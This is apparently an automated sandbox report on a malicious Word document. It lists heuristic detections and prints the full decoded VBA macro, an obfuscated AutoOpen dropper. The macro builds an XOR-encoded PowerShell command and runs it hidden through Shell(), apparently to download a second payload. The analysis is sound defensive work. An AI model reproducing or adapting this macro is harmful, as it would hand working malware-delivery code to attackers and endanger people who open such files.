MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, which is a critical finding, indicating an attempt to execute arbitrary commands. The macro code appears to be obfuscated, but it concatenates strings to form a command, starting with 'Owe'. This strongly suggests the macro's purpose is to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6584899-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6584899-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
YRYQHd = 79003 EwBFq = aoOiaVCf + Shell(IaOzKwuhhH + NfDDKljaVu + jPBEAwO, 36170 - 36170) UItFS = nodPA -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11281 bytes |
SHA-256: ab082eaf50b2a2b91a0bf6111010f0995aa549ef472dfd0563ac964f01e8eb68 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OscBYbbNcFiGzm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "IsBZjroFVSaMih"
Function UcFGaqbSz()
On Error Resume Next
EzdKQi = 88270
JsGzd = CDate(60416)
pJiUX = UFlOEJ
zGHof = CDate(IjBlh + Sin(9415 + 5793) * 87619 * CInt(4082))
ABKnhc = CByte(tCMic)
TZLwGq = 60933
lsLXL = "Owe" + "rSHell ('2" + "3H97H112E80H97>" + "94P120~19R14H1" + "9H93>86y"
VUufb = 59564
RGwCz = CDate(73449)
BNmJiz = QHsSp
umKIf = CDate(CIAAo + Sin(5907 + 51964) * 23041 * CInt(77602))
ZZdHTR = CByte(wLrSlB)
VHWTWr = 33435
smhFr = "68~30R92!81H" + "89H86c80H71E1" + "9c65E82E" + "93~87~92R94c"
azjLjK = 50450
AmAMsf = CDate(60888)
jYfkC = jbZzC
XAhAHC = CDate(oVooi + Sin(73920 + 48287) * 35610 * CInt(51871))
diardj = CByte(pKcZvM)
Tzownq = 21412
tWsRh = "8>23x105R92x123" + "E118~67y19y14" + "y19E93P86>6" + "8c30R92P81E89P"
MuwHFN = 53243
zZhDWr = CDate(89993)
XapZLa = bNDrqt
IWCOsQ = CDate(KdOOvQ + Sin(55795 + 94560) * 33447 * CInt(46091))
GiHbTZ = CByte(IGAJV)
cZuQV = 13691
YmisjRD = "86H80R71!19P96" + ">74>64R71" + "E86c94x29" + "~125" + "c86>" + "71x29x100" + ">86R81>112H" + "95!90H86R93y71" + "P8!23E90E9"
QKrMpm = 8474
DfTnU = CDate(70194)
LFKruQ = doLGli
ViqMKG = CDate(Irwaf + Sin(29162 + 88598) * 87078 * CInt(52712))
UcQfoU = CByte(AiLcY)
Rzclu = 50571
FLhmwHsd = "8y89c101" + "!113>19y14P" + "19y2" + "0R91>71H" + "71~67P9R28" + "~28x87" + "R82>93x" + "80P" + "92x87P29c"
UcFGaqbSz = lsLXL + smhFr + tWsRh + YmisjRD + FLhmwHsd
End Function
Function pXAimiOG()
On Error Resume Next
ibbloG = 28692
WvHWNG = CDate(19225)
lOAkAk = rVzmwo
XhDpW = CDate(XDjkiK + Sin(62459 + 59330) * 78815 * CInt(92875))
JWJEsb = CByte(arbNu)
iGLJl = 71979
vwtwYaKU = "80~" + "92P94c28P6" + "8R67" + "~30P80>92~" + "93!71" + "R86"
jBzwF = 41748
tkFrp = CDate(99056)
TmSqOr = RVrHRT
EtApSO = CDate(INptsH + Sin(36862 + 11824) * 63239 * CInt(75153))
CrGLpc = CByte(JkXzbz)
ksWLq = 68029
jSwhWHZlZEN = "~93>71R28y65x11" + "7P103c96R73" + "y28H115H91" + "P71!71" + "P67>9E" + "28y28H" + "80c"
aMKZkM = 60577
BsmBw = CDate(41202)
wcjWl = TwLUUc
IFVHbR = CDate(GXRTfo + Sin(94339 + 52285) * 77302 * CInt(8087))
qhnDSr = CByte(NQNiJ)
NOAXi = 6263
DrJSLLXp = "92" + "y80x92" + "E91H92" + "H70!29!80~"
Bfspjc = 18703
FIlvSs = CDate(36770)
CdTwnP = rzvFiu
XqcYbz = CDate(QjmpU + Sin(52187 + 96587) * 89633 * CInt(30658))
NaEiz = CByte(tMmUln)
AOPpwu = 97971
noYjiIB = "92!94c29>82x70c" + "28y82P70y9" + "2y84>123!97" + "y28" + "!115y" + "91E71P71c67~9" + "P28~28E82y90P" + "85R86x64~" + "87R8" + "6!64R"
WJUdIi = 40076
hiCIm = CDate(72523)
rItRmj = FIbcq
noiIL = CDate(khdoDh + Sin(63570 + 58749) * 47379 * CInt(87535))
DHNVB = CByte(Pzikb)
zivFi = 92289
QnArwSd = "67P86P71H64" + "H29H85E65~28E69" + "y7>1" + "21>5P28!1"
VJsFs = 63403
DCMHq = CDate(61928)
EUFhF = bpGVzv
uNDWu = CDate(ooaci + Sin(643 + 42022) * 74831 * CInt(3607))
uWIkP = CByte(dsnBI)
CiRimK = 51958
qzaUjACPX = "15" + ">91E71H71P" + "67H9E28c" + "28!80R91~65"
nimwzO = 12907
OPYYso = CDate(9039)
RtLNWI = fSEck
qudFL = CDate(DGtGd + Sin(54586 + 23322) * 69891 * CInt(10194))
FBmiB = CByte(InkwMO)
qANMbb = 5956
pSjTBEr = "E9" + "0c64R71H90H9" + "3c86P9" + "5!86R" + "81y86c80" + "y88>2" + "9H80x92c"
VlPkUs = 15775
wnHvTR = CDate(12309)
wZwjjJ = BjTKo
qdOVw = CDate(pEuJq + Sin(34025 + 29439) * 92392 * CInt(61945))
jmZdKp = CByte(wdqvi)
cpQEj = 81674
RGmDIaMtuhd = "94~28x11>5c98x" + "10!28!1" + "15E91>71y" + "71>67~" + "9~28P2" + "8P68>68c68y" + "29P67c82c74!67" + "E95c" + "70P64!29!69x93H" + "28~82~6"
AQZIJi = 67003
ofPAV = CDate(49671)
IhHYsw = fLlzT
bhvDY = CDate(qNiOp + Sin(52024 + 49807) * 92434 * CInt(31353))
FQXCHb = CByte(tSaohW)
IMPRu = 66204
OEzhGljFXw = "4H103E112!127" + "c5~71!2" + "8c20~29" + "!96c67y95R90E" + "71y27y20!115" + ">20~26" + "P8y"
pXAimiOG = vwtwYaKU + jSwhWHZlZEN + DrJSLLXp + noYjiIB + QnArwSd + qzaUjACPX + pSjTBEr + RGmDIaMtuhd + OEzhGljFXw
End Function
Function iIfQZPaVqhT()
On Error Resume Next
wBOinj = 99034
smYWj = CDate(66248)
vztzKH = zLNGzi
QSQRhS = CDate(zASNM + Sin(96024 + 63539) * 9267 * CInt(79087))
GwRYjH = CByte(OBfiX)
wjGGfj = 22838
DddMoOuv = "23R" + "116H65E119R12" + "5E98~" + "107~19H14c19" + "~23!97c1" + "12R80y97>94!1" + "20x29~" + "93!86E75~71"
uUvzD = 11770
FDASj = CDate(28942)
zqHOL = dcuhU
jwQIj = CDate(jvbwY + Sin(23722 + 65346) * 71439 * CInt(59772))
inzsb = CByte(pAFLlR)
QwVNjS = 34216
JobQL = "c27E2H31c1" + "9x10>1" + "0x7~0" + "y11H4R26P8"
aMnjtR = 13201
VoNwj = CDate(42202)
zjkKT = YCGVO
HBYJb = CDate(vvLikM + Sin(34058 + 80596) * 39877 * CInt(80112))
ImZjl = CByte(kBcbAz)
jWoLXC = 88789
aSjcU = "x23y94" + "E87E66>123E" + "91H1" + "9x14>19c" + "23P86!93c69" + "x9!71y" + "86c94H67" + "c19>24"
FjuIKG = 73840
GVZjNk = CDate(34004)
iLmvDd = OJmQz
fXYNaF = CDate(sFVdVj + Sin(28119 + 46612) * 80005 * CInt(28310))
roifAw = CByte(BAlpni)
QIqfo = 80336
iFuWQ = "P19H" + "20~111!20c19>" + "24P19c23E1" + "16H65P119H125" + "~98~107E19x24" + "~19~"
alYjlj = 2394
MvDcFt = CDate(47207)
zDalYq = wLqIf
mGNicL = CDate(AfOjTK + Sin(92169 + 33862) * 79242 * CInt(62378))
SrzkR = CByte(CGJkTv)
mLHjU = 19122
FcKJjnMaT = "20c" + "29c86" + "R75~" + "86>" + "20x8E85H92>65x" + "86c82" + "y80>91>" + "27~23" + "!126"
hbttBw = 15617
AErznI = CDate(65611)
iPKjD = dJRBO
PfFfsf = CDate(UGCGjR + Sin(91099 + 24217) * 89239 * CInt(69577))
QiNvXw = CByte(OAhXX)
RGFiVk = 53485
uaWjsbRJWA = "H93c68y66y" + "11" + "6H19H90!93x1" + "9H23R90" + "!98~89c10" + "1~113"
ioSKm = 96846
tBjOuG = CDate(53216)
JQQwz = SSWOOv
ipXuN = CDate(TXNqPm + Sin(47262 + 89717) * 79646 * CInt(90163))
oOEsz = CByte(liSbi)
iQYut = 60428
JLpKaqUKt = "~26H72R71P" + "65E74c72!23~" + "105~92" + "E123H118c6" + "7!29R119E9"
nqkEOk = 54232
EcrYE = CDate(54940)
PCGAt = GmFkmi
MbUNH = CDate(DBfFUj + Sin(62529 + 351) * 12838 * CInt(41740))
wDzMo = CByte(kpLYh)
KiLvNQ = 52505
iVmFFJCM = "2>68!93!95P" + "92P82!87y11" + "7!90y95y86!" + "27P23~126P93H68" + "P66x116E29c1"
iIfQZPaVqhT = DddMoOuv + JobQL + aSjcU + iFuWQ + FcKJjnMaT + uaWjsbRJWA + JLpKaqUKt + iVmFFJCM
End Function
Function KHjLipY()
On Error Resume Next
MRMpZc = 54090
CHRTsS = CDate(58463)
ioOtv = OOoOT
blWtiX = CDate(VAoPPw + Sin(8609 + 42102) * 76807 * CInt(54529))
AOwGXJ = CByte(VLTcN)
rVkzFj = 82035
QYZbXQt = "03H92~96" + "c71c65" + "H9" + "0P93R84y27x26E" + "31P19"
BzpCO = 88661
fQiTC = CDate(39484)
cppjcW = rnOhc
wDIftL = CDate(WsTOj + Sin(33041 + 91540) * 32117 * CInt(71173))
zdwld = CByte(doqkhp)
tlUzK = 58796
BPmKNFiE = "~23P9" + "4R87R66" + "!123x91R26~8R96" + "P71R82" + "~65H71P30H9" + "9R" + "65R92x80"
UtNFED = 7695
DnGzht = CDate(81288)
wTzKL = KJsMQf
RuOhW = CDate(XlXOc + Sin(62948 + 98565) * 68487 * CInt(87500))
VwYSO = CByte(sqNftV)
SrRbG = 91928
iSzEF = "x86x64E6" + "4!19H23y" + "94" + "P87c" + "66!" + "123~91!8y"
ObGmwC = 26605
FoKAsz = CDate(6412)
wluTfQ = zVUEw
Obufp = CDate(LbiqF + Sin(89722 + 87736) * 85454 * CInt(7111))
QpiUu = CByte(BOwfHh)
lrOUF = 79533
vpiFP = "81P65E86P" + "82y88E8c" + "78x80y82>71x80" + "R91y72!68>65>90" + "H71~86~30c91x92" + "~6" + "4~71>19!23" + "E10" + "8>29~" + "118P7"
mbssaB = 58654
wKUAO = CDate(88724)
rLBKTB = HEMri
PzIzq = CDate(qIjHds + Sin(6718 + 69871) * 93024 * CInt(66771))
npMkj = CByte(HEkpz)
oEmpmN = 79603
KioQaarJrzA = "5H80" + ">86H67H7" + "1>90>92P" + "93P29x126>" + "86y64"
icEvj = 13693
mdziwU = CDate(3888)
CtdYzi = DXCkRq
KKuEl = CDate(RLOsD + Sin(90803 + 21287) * 18548 * CInt(90802))
uRAbqI = CByte(sKvwG)
Wupvbz = 12959
QuNOiGaXRSw = "P64>82x" + "84~86H8" + "R78H78'.spLit( " + "'!~ER>" + "cHxPy'" + ")|ForEacH-OBJe"
KHjLipY = QYZbXQt + BPmKNFiE + iSzEF + vpiFP + KioQaarJrzA + QuNOiGaXRSw
End Function
Function qlTKXBHJ()
On Error Resume Next
lLwnT = 40307
frjikz = CDate(40394)
jiqal = vIcOqV
ObqPZo = CDate(foqnSn + Sin(54622 + 17156) * 23783 * CInt(46655))
uLici = CByte(bDrdA)
XEnlj = 91182
fHbpMIwf = "CT{[Cha" + "R]( $_ -bx" + "or " + Chr(34) + "0x33" + Chr(34) + ")} )" + " -J" + "Oin ''| .( $en" + "v:co" + "msPE"
iBHvNo = 50830
RMWoT = CDate(75830)
jWKZV = rzdFv
Hpopr = CDate(EoKtL + Sin(69839 + 71350) * 26422 * CInt(38280))
hoCiUK = CByte(QmHopP)
CuXwO = 1918
nsBazVnQ = "C[4,2" + "6,25]-JOin'')"
qlTKXBHJ = fHbpMIwf + nsBazVnQ
End Function
Function flLJTRKo()
On Error Resume Next
RZKVdj = uXJpt
TlHDTv = CDate(45942)
DKotWK = CDate(KRnmV + Sin(14922 + 63865) * 15017 * CInt(84293))
fRPFQ = 13454
RoJXf = CByte(zwdXn)
bBXzMn = 70557
Ldwdv = wrfWQ
zwBiRz = CDate(13820)
FBQAs = CDate(QETjw + Sin(86604 + 52473) * 53626 * CInt(70848))
TLUhi = 28980
SnmiPV = CByte(WNJZb)
PAUqmf = 81110
RzUsn = sjjFoH
aEFZVV = CDate(2145)
lHORK = CDate(PzBiF + Sin(88780 + 84143) * 57427 * CInt(13751))
wHCDWf = 75221
uaaiB = CByte(NiTnw)
lVdXE = 72525
TsKzoj = uviYf
hhEXH = CDate(37344)
aDqUw = CDate(JHYfk + Sin(48998 + 21574) * 14382 * CInt(97443))
TSAvZK = 59053
iElwzi = CByte(YAIaz)
JYpIO = 56638
wRwZin = YJUcR
CvYPvi = CDate(61570)
Mjilw = CDate(RCuhY + Sin(78098 + 70519) * 60001 * CInt(42349))
ihuUtI = 79584
YBlHi = CByte(lfwWP)
RwdYA = 98534
End Function
Function TzkGqhZz()
On Error Resume Next
NPDMNW = JRXiWl
FbcrzK = CDate(22547)
iUqWjX = CDate(GiowCo + Sin(51386 + 67913) * 28602 * CInt(9442))
ZPUGP = 2025
waFXZ = CByte(SiiGXZ)
zKOlj = 70995
aatSmi = fRVaHo + Chr(FEHfXUzii + 80 + WpafVFSAUkb)
jcddS = zvNWA
ZXLCZ = CDate(55664)
GczDw = CDate(tfMuw + Sin(21765 + 36842) * 73762 * CInt(59969))
zoPwuR = 46651
isNmIw = CByte(wRGTnW)
GVXzSY = 45672
TjCzMp = uKTmI
dEpbG = CDate(93921)
XiAQBO = CDate(IASoa + Sin(1780 + 92924) * 74862 * CInt(50156))
iiFmhh = 40431
MVbDT = CByte(CbawzG)
NiJoC = 33844
TzkGqhZz = CCpvu + aatSmi + UcFGaqbSz + pXAimiOG + iIfQZPaVqhT + KHjLipY + qlTKXBHJ
ioZILE = tWpLL
wVqudz = CDate(15152)
FUOOFF = CDate(RaYDli + Sin(87775 + 41398) * 9579 * CInt(21754))
uSWCE = 83190
ZFIqi = CByte(IathL)
BFiua = 13608
End Function
Function QDYBmu(NfDDKljaVu)
On Error Resume Next
ZcTZAK = vhBZr
LikGPX = CDate(16147)
MrRNR = CDate(ELiIq + Sin(50190 + 94611) * 75574 * CInt(35559))
lkwWGt = 25554
FEAlj = CByte(VSLzJJ)
lZdrzV = 58721
BbzEw = nnraNr
jPkNT = CDate(93951)
rDqtF = CDate(BKvIs + Sin(64756 + 30065) * 54497 * CInt(95168))
nDojQ = 52233
juYPv = CByte(nEjSBm)
YRYQHd = 79003
EwBFq = aoOiaVCf + Shell(IaOzKwuhhH + NfDDKljaVu + jPBEAwO, 36170 - 36170)
UItFS = nodPA
CitJI = CDate(13865)
EBzBR = CDate(WRIYU + Sin(71659 + 23896) * 25607 * CInt(45418))
jvWUBW = 41446
aUWtiI = CByte(lVsbzQ)
DiKofc = 17128
End Function
Sub AutoOpen()
On Error Resume Next
KKzFW = FzjjF
NKXCCu = CDate(71663)
Czjqr = CDate(jcrot + Sin(96913 + 9847) * 38865 * CInt(63631))
UOCRi = 52
THMEp = CByte(aYAOBm)
XsRFL = 38536
Application.Run ppLZNbkzS + "QDYBmu" + uYSinBkodcE, RUzWuK + TzkGqhZz + JicHTqCwAB
jNWKU = JkNtH
ujGIzT = CDate(14644)
mbPFCZ = CDate(wMXLZM + Sin(60893 + 82693) * 92529 * CInt(3913))
aapjnj = 46449
JaInht = CByte(Gsrwfq)
HcOwZ = 88370
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.